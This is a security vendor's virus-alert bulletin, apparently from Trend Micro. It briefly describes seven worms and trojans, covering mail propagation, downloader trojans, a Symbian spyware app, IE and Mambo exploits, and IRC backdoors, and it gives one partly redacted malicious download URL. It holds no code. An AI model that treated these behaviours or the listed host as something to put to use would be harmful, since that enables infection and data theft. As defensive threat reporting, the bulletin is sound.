[Virus Alert] 7 new worms found
Worm name: WORM_MYTOB.PE
Risk rating: HIGH
Damage Potential: HIGH
Distribution Potential: HIGH
Description:
This memory-resident worm propagates by sending email messages using its own Simple Mail Transfer Protocol (SMTP) engine or any available servers. Since its email propagation does not require any user intervention, a user is often unaware that this worm is sending out email messages. The said email message contains a spoofed link that when clicked, redirects the user to the following URL:
It harvests email addresses from the Windows Address Book (WAB). It also spoofs the From field by using certain strings along with the email addresses it gathers or generates.
By doing the said actions, this worm is able to effectively propagate and consume bandwidth.
Worm name: TROJ_MITGLIED.AL
Risk rating: HIGH
Damage Potential: HIGH
Distribution Potential: HIGH
Description:
This Trojan arrives on a system as attachment to spammed email messages. It waits for active Internet connection. Once it detects connection, it connects to certain URLs to download a possibly malicious file. It should be noted that it has a long list of URLs to download from, giving it a high chance to affect a system.
Worm name: SYMBOS_FLEXSPY.A
Risk rating: HIGH
Damage Potential: HIGH
Distribution Potential: HIGH
Description:
This commercial Symbian application needs user intervention to be installed on target devices. Upon execution, it prompts the user to install the application Phones. It also prompts the user to select where the said application is to be installed.
It logs phone activity, such as call details, SMS, MMS, GPRS, and email details. It then sends the gathered information to a remote server. The user may access the gathered information over the Internet.
The information-gathering capability of this application may be used for malicious purposes, thus, becoming a threat to information security.
Worm name: TROJ_SMALL.BOA
Risk rating: HIGH
Damage Potential: HIGH
Distribution Potential: HIGH
Description:
This Trojan usually arrives as an attachment to spammed email messages. The email message purports to be from the Federal Bureau of Investigation (FBI), informing of supposed terrorist attacks. It banks on the populace's concern and fear regarding terrorism to trick users into opening the malicious attachment.
It may also arrive as a file dropped by other malware or as a file downloaded unknowingly by a user when visiting malicious Web sites.
Upon execution, it connects to the URL, fl{BLOCKED}ntent.com/tro_usa to download a file detected by Trend Micro as TSPY_FLECSIP.N. The said routine exposes the affected system to further malicious attacks.
Worm name: JS_FLUMITA.B
Risk rating: HIGH
Damage Potential: HIGH
Distribution Potential: HIGH
Description:
This JavaScript, contained in an HTML file, redirects to a CGI Web page that exploits the Mismatched Document Object Model Objects Memory Corruption vulnerability. For more information regarding the said Windows vulnerability, refer to the following Microsoft Web page:
Because of this routine, the user may not be aware that his computer is already infected, and remains oblivious to any suspicious activity.
By connecting to this malicious Web site, the computer may be exposed to remote attacks. The aforementioned exploit takes advantage of a vulnerability in the createTextRange Method call process in Internet Explorer.
Worm name: ELF_LUPPER.I
Risk rating: HIGH
Damage Potential: HIGH
Distribution Potential: HIGH
Description:
This executable Linux file (ELF) is a command line tool used in connecting to various ports. It may be used to connect to systems controlled by remote malicious users and this routine provides them with a shell to control an affected system.
It takes advantage of the XML-RPC for PHP Remote Code Injection vulnerability, found in several applications, to propagate across networks. It does the mentioned routine by generating random IP addresses and appending certain strings to access vulnerable systems.
It also takes advantage of a known vulnerability in Mambo, which is an open source content management system commonly used in Linux platforms.
It may also connect to specific IP addresses to download and save the file LISTEN in the folder /tmp.
Worm name: ELF_KAITEN.AM
Risk rating: HIGH
Damage Potential: HIGH
Distribution Potential: HIGH
Description:
This malicious executable Linux file (ELF) may be dropped by another malware via a known vulnerability in Mambo. Mambo is an open source content management system commonly used in Linux platforms.
Mambo contains a flaw that may allow a remote attacker to execute arbitrary commands. The problem is that a script function does not validate certain variables, which can be changed to include and execute code from a remote location. It is possible that the flaw may allow a remote attacker to execute arbitrary commands resulting in a loss of integrity.
Upon execution, this malicious executable Linux file connects to certain Internet Relay Chat (IRC) servers and joins a specific IRC channel. Once a connection is established, it enables a remote malicious user to issue certain commands on the system. The said routine gives the remote malicious user virtual control over the affected system, thus compromising system security.
References: http://www.trendmicro.com/vinfo/ (TrendMirco Virus Security Info)
http://www.trendmicro.com/vinfo/zh-tw/default.asp (Traditional Chinese TrendMicro Virus Security Info
